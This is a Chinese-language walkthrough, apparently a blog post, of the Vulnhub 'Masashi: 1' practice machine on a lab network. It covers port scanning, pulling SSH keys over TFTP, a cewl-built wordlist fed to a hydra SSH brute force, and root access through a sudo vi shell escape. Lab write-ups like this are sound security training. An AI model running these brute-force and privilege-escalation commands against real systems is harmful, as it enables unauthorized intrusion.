Vulnhub: Masashi: 1靶机

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

查看80端口的robots.txt提示三个文件

snmpwalk.txt内容,tftp服务在1337端口

sshfolder.txt内容,提示用户名sv5

tftp连接目标下载id_rsaid_rsa.pub

复制代码
tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

复制代码
cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

提权

sv5用户sudo权限

提升为root

复制代码
sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

flag

相关推荐
老赵聊算法、大模型备案12 分钟前
新规解读:2025 年修正版《中华人民共和国网络安全法》核心变化解读
安全·web安全
360安全应急响应中心1 小时前
iOS安全开发中的Frida检测
安全·逆向
咘噜biu2 小时前
Java后端和前端的接口数据加密方案(椭圆曲线集成加密方案)
java·前端·安全·aes·密钥协商ecdh·椭圆曲线集成加密方案
Bug.ink3 小时前
BUUCTF——WEB(4)
前端·网络安全·靶场·ctf·buuctf
乾元3 小时前
Service Mesh 与网络抽象:AI 如何做服务层次网络策略生成(微服务 / 云原生)
网络·人工智能·安全·微服务·云原生·运维开发·service_mesh
B2_Proxy4 小时前
如何搭建高速稳定安全的网络环境?住宅代理是关键
服务器·网络·安全
米羊1214 小时前
fastjson (1概述)
网络·安全
94620164zwb55 小时前
隐私安全模块 Cordova 与 OpenHarmony 混合开发实战
安全
缘友一世5 小时前
计算机网络中的安全(8)复习
网络·计算机网络·安全
能年玲奈喝榴莲牛奶6 小时前
安全服务-应急响应测评
安全·web安全·安全服务